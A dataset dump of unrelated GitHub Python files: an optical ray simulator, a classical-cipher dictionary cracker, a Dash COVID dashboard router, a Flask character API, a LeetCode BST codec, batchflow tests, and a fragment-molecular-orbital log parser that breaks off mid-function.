rapports aux paramètres de la lentille.\n\n ----------\n fig : matplotlib figure\n Figure sur laquelle tracer le dioptre.\n x : float\n centre de la lentille\n r : float\n Rayon du cercle.\n s : float\n distance entre le centre de la lentille et les sommets des cercles\n n : float\n indice de réfraction de la lentille\n type : str\n type de la lentille (convergent ou divergent)\n color : str\n Couleur du miroir\n \"\"\"\n def __init__(self,fig, x, r, s,n,type = \"convergent\", color = \"darkturquoise\"):\n self.fig = fig\n\n self.x = x #Centre de la lentille\n self.r = r #Rayon des dioptres\n self.s = s #Distance entre le centre de la lentille et les sommets des dioptres\n self. n = n #Indice de réfraction de la lentille\n self.color = color #Couleur de la lentille\n self.type = type #Type de lentille\n \n #Si l'utilisateur ne rentre pas un bon type de lentille, le programme reporte une erreur\n if self.type not in [\"convergent\", \"divergent\"]:\n raise ValueError(\"{} is not a valid lens type\".format(self.type))\n\n #Appel de la méthode correspondant au type de lentille pour tracer les interfaces de la bonne manière\n if self.type == \"convergent\":\n self.convergent()\n else:\n self.divergent()\n\n def convergent(self):\n diametre = np.arccos((self.r-self.s)/self.r)\n\n c1 = self.x + self.r - self.s #Centre du premier cercle\n c2 = self.x + self.s - self.r #Centre du deuxieme cercle\n\n\n teta1 = np.linspace(-diametre, diametre, 100) #Vecteurs contenant les angles nécessaires au tracé\n teta2 = np.linspace(-diametre+np.pi, diametre+np.pi, 100)\n\n #Création des deux surfaces\n lst_dioptre.append(sous_dioptre(fig, c1, self.r, teta2, 1, self.n, True, color = self.color))\n lst_dioptre.append(sous_dioptre(fig, c2, self.r, teta1, self.n, 1, False, color = self.color))\n\n def divergent(self):\n diametre = np.arccos((self.r-self.s)/self.r) #angle d'ouverture maximale\n\n c1 = self.x + self.s + self.r #Centre du premier cercle\n c2 = self.x - self.s - self.r #Centre du deuxieme cercle\n\n teta1 = np.linspace(-diametre, diametre, 1000) #Vecteurs contenant les angles nécessaires au tracé\n teta2 = np.linspace(-diametre+np.pi, diametre+np.pi, 1000)\n\n #Création des deux surfaces\n lst_dioptre.append(sous_dioptre(fig, c2, self.r, teta1, 1,self.n, False, color = self.color))\n lst_dioptre.append(sous_dioptre(fig, c1, self.r, teta2,self.n, 1, True, color = self.color))\n \n \n\n \n\n \n\n\n \nif __name__ == \"__main__\":\n fig = plt.subplots() #Création de la figure\n\n #Limites, grille, ratio des axes..\n fig[1].set_xlim(-20,20)\n fig[1].set_ylim(-15,15)\n fig[1].grid(True)\n fig[1].set_aspect(\"equal\")\n\n #Listes vides que l'on va remplir par les objets\n lst_ray = []\n lst_miroir = []\n lst_source = []\n lst_dioptre = [] #Cette liste n'est pas a remplir par l'utilisateur, c'est le programme qui la rempli automatiquement\n \n #On créé les objets miroir et source que l'on ajoute dans la liste correspondant\n lst_miroir.append(miroir(x = 15, r=-15, diametre = np.pi/4, fig = fig, color = \"blue\")) \n \n dioptre(fig, 0, 12,0.5,1.38, type = \"divergent\")\n \n lst_source.append(source(fig,-10, 0,np.pi/12, 100, inf = True, height = 4))\n\n \n\n plt.show()\n\n\n\n","repo_name":"Cozipro/Ray_simulator","sub_path":"Ray_simulator/Ray_simulator.py","file_name":"Ray_simulator.py","file_ext":"py","file_size_in_byte":16125,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14086293086","text":"import logging\nimport string\nimport math\n\nlogger = logging.getLogger(__name__)\n\ndef crack(cipher_txt,dec_func,dictionary,likely_words,ic=False,min_rating=1):\n \"\"\"\n Accepts a cipher text and decipher function and deciphers the text\n looking for likely words. The dictionary should be a lazy function\n \"\"\"\n likely_words = likely_words.split(\" \")\n if not callable(dec_func):\n logger.error(\"Decipher function is not callable\")\n raise ValueError(\"dec_func is not callable\")\n\n results = []\n for word in dictionary():\n deciphered = dec_func(cipher_txt,word)\n if isinstance(deciphered,str):\n score = rate_output(likely_words,deciphered,ic)\n if score >= min_rating:\n results.append((word,deciphered,score))\n\n #Sort results by the score\n results = sorted(results,key=lambda x:x[2])\n for result in results:\n print(\"Score: {},Key: {}\\n{}\".format(result[2],result[0],result[1]))\n\ndef rate_output(likely_words,cipher,ic=False):\n \"\"\"\n Rates a output based on the occurences of the likely words and if\n enabled the index of coincidence\n \"\"\"\n target_ic = 1.73\n sd = 0.25\n cipher = cipher.upper()\n rating = 0\n for word in likely_words:\n if word.upper() in cipher:\n rating += 1\n if ic:\n rating *= apply_normal_dist(calculate_ic(cipher),target_ic,sd)\n return rating\n\ndef calculate_ic(text):\n \"\"\"\n Calculates the index of coincidence of a given text, english text\n should have a IC of ~1.73\n \"\"\"\n alphabet = string.ascii_lowercase\n text = text.lower()\n new_text = \"\"\n occurences = {}\n for c in text:\n if c in alphabet:\n new_text += c\n if c in occurences:\n occurences[c] += 1\n else:\n occurences[c] = 1\n observed = sum(\n [occurences[x]*(occurences[x]-1) for x in occurences])\n random = (1/len(alphabet))*len(new_text)*(len(new_text)-1)\n return observed/random\n\ndef apply_normal_dist(x,mean,sd):\n \"\"\"\n Get the y value for a given x value using the normal distribution\n with a given mean and standard deviation\n \"\"\"\n return (1/(sd*(2*math.pi)**0.5))*math.e**((-(x-mean)**2)/(2*(sd**2)))\n","repo_name":"TomJamesGray/cipher-crack","sub_path":"cipher_crack/crack.py","file_name":"crack.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17154724880","text":"## main page ##\n### ONTARIO SCHOOLS COVID-19 ANALYSIS ###\n#### PLOTLY DASH APP - VERSION 2.01 ####\n\n##### BY: PETER STANGOLIS #####\n\n## Import the required libraries ##\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\n# Connect to main app.py file\nfrom app import app\nfrom app import server\n\n# Connect to your app pages\nfrom apps import metrics, sch_select\n\n\napp.layout = html.Div([\n dcc.Location(id='url', refresh=False),\n html.Div([\n dcc.Link('(1) Daily Metrics | ', href='/apps/metrics'),\n dcc.Link('(2) Search by School - Municipality', href='/apps/sch_select'),\n ], className=\"row\"),\n html.Div(id='page-content', children=[])\n])\n\n\n@app.callback(Output('page-content', 'children'),\n [Input('url', 'pathname')])\ndef display_page(pathname):\n if pathname == '/apps/metrics':\n return metrics.layout\n if pathname == '/apps/sch_select':\n return sch_select.layout\n else:\n return \"Please choose a link above to view dashboard\"\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"Peterstangolis/ONTSchoolApp_2.0","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34080699937","text":"import logging\nimport os\nimport os.path\nimport random\n\nimport cherrypy\nimport click\nfrom flask import abort, Blueprint, Flask, jsonify\nfrom flask_caching import Cache\nfrom requestlogger import ApacheFormatter, WSGILogger\nimport opentracing\nfrom flask_opentracing import FlaskTracer\nfrom jaeger_client import Config\nfrom prometheus_flask_exporter import PrometheusMetrics\nimport simplejson as json\nimport slugify\nfrom werkzeug.contrib.fixers import ProxyFix\n\n__version__ = \"0.1.0\"\nTHUMBNAIL_NOT_FOUND = 'http://i.annihil.us/u/prod/marvel/i/mg/b/40/image_not_available'\n\npowersource = Blueprint(\"powersource\", __name__)\ncache = Cache()\nmetrics = PrometheusMetrics(app=None)\n\ncurdir = os.getcwd()\ncharacters = []\nindexes = []\n\n\ndef init_tracer():\n return Config(\n config={\n 'logging': True,\n 'local_agent': {\n 'reporting_host': os.getenv(\"JAEGER_HOST\", \"localhost\")\n },\n 'sampler': {'type': 'const', 'param': 1}\n }, service_name='powersource', validate=True\n ).initialize_tracer()\ntracer = FlaskTracer(init_tracer, True, app=powersource)\n\n\ndef load_characters():\n with open(os.path.join(curdir, \"characters.json\")) as f:\n characters.extend(json.load(f))\n for index, c in enumerate(characters):\n thumbnail = c[\"thumbnail\"]\n if thumbnail[\"path\"] == THUMBNAIL_NOT_FOUND:\n continue\n indexes.append(index)\n\n\n@powersource.route(\"/\")\n@cache.cached(timeout=600)\ndef index(character_id: int):\n if character_id not in indexes:\n return abort(404)\n\n character = characters[character_id]\n extension = character[\"thumbnail\"][\"extension\"]\n img_url = \"{}.{}\".format(\n slugify.slugify(character[\"name\"]),\n extension\n )\n learn_more_url = None\n for url in character.get(\"urls\", []):\n if url[\"type\"] == \"detail\":\n learn_more_url = url[\"url\"]\n break\n\n return jsonify(dict(\n name=character[\"name\"], description=character[\"description\"],\n img_url=img_url, learn_more_url=learn_more_url))\n\n\n@powersource.route(\"/random\")\ndef rand() -> str:\n return jsonify({\"character_id\": random.choice(indexes)})\n\n\n@powersource.route(\"/health\")\ndef health():\n return \"\", 200\n\n\n@powersource.route(\"/live\")\ndef live():\n return \"\", 200\n\n\n\ndef initialize_metrics(app: Flask):\n metrics.init_app(app)\n metrics.info('powersource', 'Application info', version=__version__)\n\n\ndef initialize_cache(app: Flask):\n cache.init_app(app, config={'CACHE_TYPE': 'simple'})\n\n\ndef mount_apps(app: Flask):\n app.register_blueprint(powersource)\n app.wsgi_app = ProxyFix(app.wsgi_app)\n wsgiapp = WSGILogger(\n app.wsgi_app, [logging.StreamHandler()], ApacheFormatter(),\n propagate=False)\n cherrypy.tree.graft(wsgiapp, \"/\")\n\n\n\ndef create_app() -> Flask:\n app = Flask(__name__)\n app.register_blueprint(powersource)\n load_characters()\n initialize_cache(app)\n initialize_metrics(app)\n mount_apps(app)\n return app\n\napp = create_app()","repo_name":"chaostoolkit-incubator/community-playground","sub_path":"superpower/powersource/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"} +{"seq_id":"30638134770","text":"\"\"\"\nSolution for 449. Serialize and Deserialize BST\nhttps://leetcode.com/problems/serialize-and-deserialize-bst/\n\"\"\"\n\nfrom collections import deque\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Codec:\n \"\"\"\n Serialization is the process of converting a data structure or object into a sequence of bits so that it can be stored in a file or memory buffer, or transmitted across a network connection link to be reconstructed later in the same or another computer environment.\n\n Design an algorithm to serialize and deserialize a binary search tree. There is no restriction on how your serialization/deserialization algorithm should work. You just need to ensure that a binary search tree can be serialized to a string and this string can be deserialized to the original tree structure.\n\n The encoded string should be as compact as possible.\n\n Note: Do not use class member/global/static variables to store states. Your serialize and deserialize algorithms should be stateless.\n\n Submission:\n Runtime: 64 ms, faster than 87.69% of Python3 online submissions for Serialize and Deserialize BST.\n Memory Usage: 17.5 MB, less than 100.00% of Python3 online submissions for Serialize and Deserialize BST.\n \"\"\"\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\n \"\"\"\n return self.postorder_serialize(root)\n\n def preorder_serialize(self, root: TreeNode) -> str:\n \"\"\"\n A pre-order serialization that runs in O(N) in time and O(N) in space\n\n Args:\n root:\n\n Returns:\n\n \"\"\"\n inorder, preorder = [], []\n\n def rec(node):\n if not node:\n return\n preorder.append(str(node.val))\n rec(node.left)\n inorder.append(str(node.val))\n rec(node.right)\n\n rec(root)\n return ','.join(inorder) + ':' + ','.join(preorder)\n\n def postorder_serialize(self, root: TreeNode) -> str:\n \"\"\"\n A postorder serialization solution that runs in O(N) in time and space\n\n Args:\n root:\n\n Returns:\n\n \"\"\"\n postorder = []\n\n def rec(node):\n if not node:\n return\n rec(node.left)\n rec(node.right)\n postorder.append(str(node.val))\n\n rec(root)\n return ','.join(postorder)\n\n def deserialize(self, data: str) -> TreeNode:\n \"\"\"Decodes your encoded data to tree.\n \"\"\"\n return self.postorder_deserialize(data)\n\n def preorder_deserialize(self, data: str) -> TreeNode:\n \"\"\"\n A pre-order deserialization method that runs in O(N^2) in time and O(N) in\n space\n\n Args:\n data:\n\n Returns:\n\n \"\"\"\n inorder, preorder = data.split(':')\n if not inorder or not preorder:\n return None\n\n inorder = [int(v) for v in inorder.split(',')]\n preorder = deque([int(v) for v in preorder.split(',')])\n\n def rec(nums):\n if not nums:\n return None\n val = preorder.popleft()\n pivot = nums.index(val)\n node = TreeNode(val)\n node.left = rec(nums[:pivot])\n node.right = rec(nums[pivot + 1:])\n return node\n\n return rec(inorder)\n\n def postorder_deserialize(self, data: str) -> TreeNode:\n \"\"\"\n A post-order deserialization method that runs in O(N) in time and space\n\n Args:\n data:\n\n Returns:\n\n \"\"\"\n if not data:\n return None\n stack = [int(v) for v in data.split(',')]\n\n def rec(lower, upper):\n if not stack or stack[-1] < lower or stack[-1] > upper:\n return None\n val = stack.pop()\n node = TreeNode(val)\n node.right = rec(val, upper)\n node.left = rec(lower, val)\n return node\n\n return rec(float('-inf'), float('inf'))\n\n# Your Codec object will be instantiated and called as such:\n# codec = Codec()\n# codec.deserialize(codec.serialize(root))","repo_name":"KKosukeee/CodingQuestions","sub_path":"LeetCode/449_serialize_and_deserialize_bst.py","file_name":"449_serialize_and_deserialize_bst.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41000937270","text":"# pylint: disable=redefined-outer-name, missing-docstring\nimport sys\n\nimport pytest\nimport numpy as np\n\nsys.path.append('..')\nfrom batchflow import Dataset, Batch, apply_parallel, B\n\n\nclass MyBatch(Batch):\n components = 'images', 'masks'\n\n @apply_parallel\n def ap_test(self, item, param, **kwargs):\n _ = kwargs\n if isinstance(item, tuple):\n return item[0] * param + item[1] * param\n return item * param\n\n @apply_parallel(requires_rng=True)\n def ap_requires_rng_test(self, item, rng=None, **kwargs):\n _ = kwargs\n if isinstance(item, tuple):\n return item[0] + item[1] + rng.uniform()/CONST + CONST\n return item + rng.uniform()\n\n\nBATCH_SIZE = 8\nARRAY_INIT = np.arange(BATCH_SIZE).reshape((-1, 1))\nCONST = 42\n\n\n@pytest.mark.parametrize('src_dst', [\n ('images', 'masks'),\n (['images', 'masks'], ['outputs1', 'outputs2']),\n (('images', 'masks'), 'outputs'),\n])\ndef test_apply_parallel(src_dst):\n \"\"\" Check `apply_parallel` is evaluated properly \"\"\"\n src, dst = src_dst\n\n pipeline = (Dataset(10, MyBatch)\n .pipeline()\n .update(B.images, ARRAY_INIT)\n .update(B.masks, ARRAY_INIT)\n .ap_test(src=src, dst=dst, param=CONST)\n )\n\n b = pipeline.next_batch(BATCH_SIZE)\n\n if isinstance(src, str):\n assert (getattr(b, src) * CONST == getattr(b, dst)).all()\n elif isinstance(src, list):\n for src_, dst_ in zip(src, dst):\n assert (getattr(b, src_) * CONST== getattr(b, dst_)).all()\n elif isinstance(src, tuple):\n assert (ARRAY_INIT * CONST * 2 == b.outputs).all()\n\n\n@pytest.mark.parametrize('src_dst', [\n ('images', 'masks'),\n (['images', 'images'], ['outputs1', 'outputs2']),\n (('images', 'masks'), 'outputs'),\n])\ndef test_apply_parallel_requires_rng(src_dst):\n \"\"\" Check that `rng`, supplied by applied parallel, works and\n reproduces the same results for each `src` in a list.\n \"\"\"\n src, dst = src_dst\n\n pipeline = (Dataset(10, MyBatch)\n .pipeline()\n .update(B.images, ARRAY_INIT)\n .update(B.masks, ARRAY_INIT)\n .ap_requires_rng_test(src=src, dst=dst)\n )\n\n b = pipeline.next_batch(BATCH_SIZE)\n\n if isinstance(src, str):\n assert (getattr(b, src) != getattr(b, dst)).any()\n assert np.allclose(getattr(b, src), getattr(b, dst), atol=1)\n elif isinstance(src, list):\n assert (getattr(b, dst[0]) == getattr(b, dst[1])).all()\n elif isinstance(src, tuple):\n assert np.allclose(b.outputs, ARRAY_INIT * 2 + CONST, atol=1/CONST)\n\ndef test_apply_parallel_requires_rng_fixed_seed():\n \"\"\" Check that `shuffle`, supplied at pipeline run, produces the same results for multiple runs. \"\"\"\n pipeline = (Dataset(10, MyBatch)\n .pipeline()\n .update(B.images, ARRAY_INIT)\n .update(B.masks, ARRAY_INIT)\n .ap_requires_rng_test(src='images', dst='outputs')\n )\n b = pipeline.next_batch(BATCH_SIZE, shuffle=42)\n value1 = b.random.uniform()\n outputs1 = b.outputs\n\n pipeline = (Dataset(10, MyBatch)\n .pipeline()\n .update(B.images, ARRAY_INIT)\n .update(B.masks, ARRAY_INIT)\n .ap_requires_rng_test(src='images', dst='outputs')\n )\n b = pipeline.next_batch(BATCH_SIZE, shuffle=42)\n value2 = b.random.uniform()\n outputs2 = b.outputs\n\n assert value1 == value2\n assert (outputs1 == outputs2).all()\n","repo_name":"analysiscenter/batchflow","sub_path":"batchflow/tests/apply_parallel_test.py","file_name":"apply_parallel_test.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":194,"dataset":"github-code","pt":"21"} +{"seq_id":"42945288274","text":"import sys\nimport os\nscrdir = os.path.abspath(os.path.dirname(__file__))\nsys.path.append(scrdir)\n\nfrom multiprocessing import Pool\nimport copy\nimport random\nimport math\nimport re\nimport subprocess\nimport csv\nimport pdb_io as pdio\nimport time\nfrom ctypes import *\n\ntry:\n import numpy as np\nexcept:\n pass\ntry:\n import collections\nexcept:\n pass\ntry:\n import pandas as pd\nexcept:\n pass\ntry:\n import itertools\nexcept:\n pass\n\nclass anlfmo(pdio.pdb_io):\n def __init__(self):\n super().__init__()\n self.cpfflag = True\n self.solv_flag = False # True -> in water , False -> in vacuum\n self.abinit_ver = True\n self.memory = 3000\n self.npro = 8\n self.para_job = 1\n self.cutmode = 'sphere'\n self.abinit_ver = 'rev11'\n self.piedaflag = True\n self.molname = []\n self.criteria = []\n self.tgtpos = []\n self.icolumn = ['I', 'J', 'DIST', 'DIMER-ES', 'HF-IFIE', 'MP2-IFIE',\n 'PR-TYPE1', 'GRIMME', 'JUNG', 'HILL']\n self.bicolumn = ['I', 'J', 'DIST', 'DIMER-ES-BSSE', 'HF-BSSE',\n 'MP2-BSSE', 'PR-T1-BSSE', 'GRIMME-BSSE',\n 'JUNG-BSSE', 'HILL-BSSE']\n self.pcolumn = ['I', 'J', 'ES', 'EX', 'CT-mix', 'DI(MP2)', 'q(I=>J)']\n self.pcolumnpb = ['I', 'J', 'ES', 'EX', 'CT-mix', 'Solv(ES)',\n 'DI(MP2)', 'q(I=>J)']\n self.ifdfsumcolumn = ['HF-IFIE', 'MP2-IFIE', 'PR-TYPE1',\n 'GRIMME', 'JUNG', 'HILL', 'ES',\n 'EX', 'CT-mix', 'DI(MP2)', 'q(I=>J)']\n self.logMethod = 'MP2'\n\n self.anlmode = 'frag' # frag, 'mol', 'fraginmol', 'multi'\n self.fragmode = 'auto' # 'hybrid', 'auto', 'manual'\n self.dist = 1000.0\n self.tgt1frag = None\n\n self.rpdbflag = False\n self.pdbname = None\n self.is_disp = False\n\n # -- for mol mode or multi mode--\n self.tgt2type = 'frag' # frag: mol-frag, mol: mol-mol\n\n # mol - mol mode\n self.selecttype = 'molid'\n self.tgtmolid = None\n\n # -- fraginmol mode --\n self.tgt1_lofrag = None\n self.tgt2_lofrag = None\n self.tgt2molname = None\n # ------ multi mode ------\n # if tgt2type == 'frag':\n self.ifdfs = []\n self.pidfs = []\n self.tgt1frag = None\n self.tgt2frag = None\n\n # if tgt2type == 'molname':\n self.tgt2dist = None\n\n # multi file setting\n self.ilog_head = None\n self.ilog_tail = None\n self.pdb_head = None\n self.pdb_tail = None\n\n self.start = None\n self.end = None\n self.interval = None\n\n # --hybrid mode\n self.hyfrag = None # 320\n self.hynum = None\n\n self.pynp = 3\n self.addresinfo = True\n self.writeresnamecsv = True\n\n mydir = os.path.dirname(os.path.abspath(__file__))\n self.f90sofile = mydir + '/f90/bin/readifiepiedalib.so'\n self.f90soflag = True\n\n # for svd\n self.matrixtype = 'normal'\n self.exceptfrag = []\n\n self.pbflag = False\n self.nf = 0\n pass\n\n def read_fraginfo(self, fname):\n frags = []\n count = 0\n with open(fname, 'r') as file:\n flag = False\n while True:\n # for i in range(len(text)):\n # itemList = text[i][:-1].split()\n itemList = file.readline().strip().split()\n print(itemList)\n if len(itemList) < 2:\n continue\n if itemList[1] == 'AUTOMATIC' or itemList[1] == 'HYBRID':\n flag = True\n continue\n if itemList[1] == 'MANUAL':\n manflag = True\n if itemList[1] == 'system' or itemList[0] == 'Ions':\n print('read end')\n break\n if flag is True:\n count += 1\n if flag is True and count > 2:\n if self.fragmode == 'hybrid':\n frags.append(itemList[3] + itemList[1])\n elif self.fragmode == 'auto':\n frags.append(itemList[2] + itemList[0])\n\n return frags\n\n def read_pieda(self, fname):\n ifie = []\n count = 0\n text = open(fname, \"r\").readlines()\n flag = False\n # print text\n for i in range(len(text)):\n itemList = text[i][:-1].split()\n # print itemList\n if len(itemList) < 2:\n continue\n if itemList[1] == 'PIEDA':\n flag = True\n # head.append(itemList)\n continue\n if itemList[1] == 'Mulliken':\n # flag = False\n break\n if flag is True:\n count += 1\n if flag is True and count > 2:\n ifie.append(itemList)\n\n return ifie\n\n def getconnect(self, idxs, molfrags, df, tgtid):\n '''getconnect\n\n get connect info\n\n Args:\n idxs (list): index list\n molfrags (list): molfrag list\n df (DataFrame): ifie DataFrame\n tgtid (int): target id\n Returns:\n newfrags (list): new frag list\n molfrags (list): molfrag list\n '''\n\n neighbors_list = []\n # print(idxs)\n for idx in idxs:\n tgtdf = df[df['I'] == idx]\n tgtdf = tgtdf.append(df[df['J'] == idx])\n tgtdf_zero = tgtdf[tgtdf['DIST'] == 0.]\n # print(tgtdf_zero)\n neighbor_i = [index for index, row in tgtdf_zero.groupby(\"I\")]\n neighbor_j = [index for index, row in tgtdf_zero.groupby(\"J\")]\n neighbors = set(neighbor_i + neighbor_j)\n # print('connect_idx', neighbors)\n neighbors_list.append(neighbors)\n neighbors_flat = list(itertools.chain.from_iterable(neighbors_list))\n # print(idx)\n\n newfrags = []\n for idx in neighbors_flat:\n if idx == tgtid:\n if self.anlmode != 'fraginmol':\n continue\n if idx not in molfrags:\n molfrags.append(idx)\n newfrags.append(idx)\n\n return newfrags, molfrags\n\n def getmolfrags(self, tgtid, df):\n '''getmolfrags\n\n get molfrag list\n\n Args:\n tgtid (int): target id\n df (DataFrame): ifie DataFrame\n Returns:\n molfrags (list): molfrag list\n '''\n\n molfrags = [tgtid]\n newfrags = [tgtid]\n while True:\n newfrags, molfrags = self.getconnect(newfrags, molfrags, df, tgtid)\n # print (newfrags, molfrags)\n if len(newfrags) == 0:\n break\n molfrags.sort()\n # print('aaa', molfrags)\n\n return molfrags\n\n def getallmolfrags(self, logname, df, nf):\n # fragment connect is judged by checking frag-frag distance\n alfrags = []\n molfragss = []\n for i in range(1, nf+1):\n if i in alfrags:\n # print(i, 'already')\n continue\n molfrags = self.getmolfrags(i, df)\n molfragss.append(molfrags)\n for j in molfrags:\n alfrags.append(j)\n # print(molfragss)\n return molfragss\n\n def getlognf(self, logname, fragmode):\n # print('fragmode', fragmode)\n if fragmode == 'manual':\n text = open(logname, \"r\").readlines()\n for i in range(len(text)):\n itemList = text[i][:-1].split()\n # print(itemList)\n if len(itemList) < 2:\n continue\n if itemList[:2]== ['NF', '=']:\n nf = int(itemList[2])\n break\n if fragmode == 'auto':\n f = open(logname, 'r')\n readflag = False\n autoreadflag = False\n fragdata = []\n fragdatas = []\n elecs = []\n seqnos = []\n fragnos = []\n residuestr = []\n logreadGeom = []\n pdbabs = \"\"\n\n for line in f:\n items = line[1:].split()\n chains = line[0]\n if len(items) == 0:\n continue\n\n if items[0] == 'ReadGeom':\n logreadGeom = items[2]\n\n if items[0] == 'AutoFrag':\n if items[2] == 'ON':\n self.fragmode = 'auto'\n else:\n self.fragmode = 'manual'\n\n # read frag table\n # if len(items) == 3:\n # print (items)\n if items[0:3] == ['Frag.', 'Elec.', 'ATOM']:\n readflag = True\n # print('# readflag ON #')\n continue\n if items[0:2] == [\"ALL\", \"ELECTRON\"]:\n fragdatas.append(fragdata)\n readflag = False\n if items[0:2] == [\"ALL\", \"ATOM\"]:\n natom = int(items[3])\n if readflag is True:\n if line[0:21] == \" \":\n # print(line)\n fragdata = fragdata + items\n else:\n if len(fragdata) != 0:\n fragdatas.append(fragdata)\n elecs.append(int(elec))\n fragdata = []\n elec = items[1]\n fragdata = fragdata + items[2:]\n\n if items [0:2] == ['START', 'FRAGMENT']:\n break\n\n ## AUTOMATIC FRAGMENTATION\n if items[0:3] == ['Seq.', 'Frag.', 'Residue']:\n autoreadflag = True\n continue\n\n if autoreadflag == True and items[0:2] == ['The', 'system']:\n autoreadflag = False\n continue\n\n if autoreadflag == True and items[0] == 'Ions':\n autoreadflag = False\n continue\n\n if autoreadflag == True:\n # print(items)\n seqnos.append(items[0])\n fragnos.append(items[1])\n residuestr.append(items[2])\n\n nf = len(fragdatas)\n # print('-------nf--------', nf)\n # print(fragdatas)\n\n return nf\n\n def readlog(self, logname, fragmode):\n # print('fragmode', fragmode)\n if fragmode == 'manual':\n text = open(logname, \"r\").readlines()\n for i in range(len(text)):\n itemList = text[i][:-1].split()\n # print(itemList)\n if len(itemList) < 2:\n continue\n if itemList[:2]== ['NF', '=']:\n nf = int(itemList[2])\n break\n if fragmode == 'auto':\n f = open(logname, 'r')\n readflag = False\n autoreadflag = False\n fragdata = []\n fragdatas = []\n elecs = []\n seqnos = []\n fragnos = []\n residuestr = []\n logreadGeom = []\n pdbabs = \"\"\n\n for line in f:\n items = line[1:].split()\n chains = line[0]\n if len(items) == 0:\n continue\n\n if items[0] == 'ReadGeom':\n logreadGeom = items[2]\n\n if items[0] == 'AutoFrag':\n if items[2] == 'ON':\n self.fragmode = 'auto'\n else:\n self.fragmode = 'manual'\n\n # read frag table\n # if len(items) == 3:\n # print (items)\n if items[0:3] == ['Frag.', 'Elec.', 'ATOM']:\n readflag = True\n # print('# readflag ON #')\n continue\n if items[0:2] == [\"ALL\", \"ELECTRON\"]:\n fragdatas.append(fragdata)\n readflag = False\n if items[0:2] == [\"ALL\", \"ATOM\"]:\n natom = int(items[3])\n if readflag == True:\n if line[0:21] == \" \":\n # print(line)\n fragdata = fragdata + items\n else:\n if len(fragdata) != 0:\n fragdatas.append(fragdata)\n elecs.append(int(elec))\n fragdata = []\n elec = items[1]\n fragdata = fragdata + items[2:]\n\n if items [0:2] == ['START', 'FRAGMENT']:\n break\n\n ## AUTOMATIC FRAGMENTATION\n if items[0:3] == ['Seq.', 'Frag.', 'Residue']:\n autoreadflag = True\n continue\n\n if autoreadflag == True and items[0:2] == ['The', 'system']:\n autoreadflag = False\n continue\n\n if autoreadflag == True and items[0] == 'Ions':\n autoreadflag = False\n continue\n\n if autoreadflag == True:\n # print(items)\n seqnos.append(items[0])\n fragnos.append(items[1])\n residuestr.append(items[2])\n\n nf = len(fragdatas)\n print('-------nf--------', nf)\n\n return natom\n\n def getlognatom(self, fname):\n acount = 0\n flag = False\n f =open(fname, \"r\")\n text = f.readlines()\n for i in range(len(text)):\n itemList = text[i].split()\n if itemList[0:4] == ['##', 'READ', 'MOLECULAR', 'STRUCTURE']:\n flag = True\n continue\n if flag:\n if itemList[0:3] == ['##', 'Molecular', 'formula']:\n break\n elif len(itemList) <= 1:\n continue\n else:\n acount += 1\n return acount\n\n\n def getlogchg(self, fname, natom):\n chgs = []\n f =open(fname, \"r\")\n text = f.readlines()\n for i in range(len(text)):\n itemList = text[i].split()\n # MO\n if itemList == ['TWO-STAGE', 'RESP', 'FITTING:', 'SECOND', 'STAGE']:\n for j in range(int(natom)):\n chgval = text[i+20+j].split()\n chgs.append(float(chgval[2]))\n\n # FMO\n if itemList == ['##', 'ESP-FITTING', 'TYPE:', 'RESP']:\n for j in range(int(natom)):\n chgval = text[i+6+j].split()\n chgs.append(float(chgval[4]))\n return chgs\n\n\n def getlogchgall(self, fname, natom, chgtype):\n alabs = []\n elems = []\n ress = []\n frags = []\n chgs = []\n pops = []\n f =open(fname, \"r\")\n text = f.readlines()\n if chgtype == 'nbo':\n for i in range(len(text)):\n itemList = text[i].split()\n # FMO\n if itemList == ['##', 'NATURAL', 'ATOMIC', 'POPULATIONS']:\n for j in range(int(natom)):\n chgval = text[i+6+j].split()\n alabs.append(int(chgval[0]))\n elems.append(str(chgval[1]))\n ress.append(int(chgval[2]))\n frags.append(int(chgval[3]))\n chgs.append(float(chgval[4]))\n pops.append(float(chgval[5]))\n chgdf=pd.DataFrame({'AtomLabel':alabs,\n 'Elem': elems,\n 'Res': ress,\n 'Frag': frags,\n 'Charge': chgs,\n 'Pop': pops})\n else:\n print('Options except A are not supported yet.')\n sys.exit()\n return chgdf\n\n '''\n ========================================================\n ## NATURAL POPULATION ANALYSIS -- Ver.2.73(20131003)\n ========================================================\n\n\n ## NATURAL ATOMIC POPULATIONS\n\n -----------------------------------------\n Atom Res Frag Charge Pop\n FMO2-HF FMO2-HF\n -----------------------------------------\n 1 N 1 1 -0.801541 7.801541\n 2 C 1 1 -0.108078 6.108078\n 3 C 1 2 0.847514 5.152486\n 4 O 1 2 -0.776786 8.776786\n 5 C 1 1 -0.669410 6.669410\n 6 H 1 1 0.461111 0.538889\n '''\n\n def getlogorpdbfrag(self, ifile):\n\n f = open(ifile, 'r')\n readflag = False\n autoreadflag = False\n fragdata = []\n fragdatas = []\n elecs = []\n seqnos = []\n fragnos = []\n residuestr = []\n logreadGeom = []\n pdbabs = \"\"\n\n for line in f:\n items = line[1:].split()\n chains = line[0]\n if len(items) == 0:\n continue\n\n if items[0] == 'ReadGeom':\n logreadGeom = items[2]\n\n if items[0] == 'AutoFrag':\n if items[2] == 'ON':\n self.fragmode = 'auto'\n else:\n self.fragmode = 'manual'\n\n # read frag table\n if items[0:3] == ['Frag.', 'Elec.', 'ATOM']:\n readflag = True\n continue\n if items[0:2] == [\"ALL\", \"ELECTRON\"]:\n 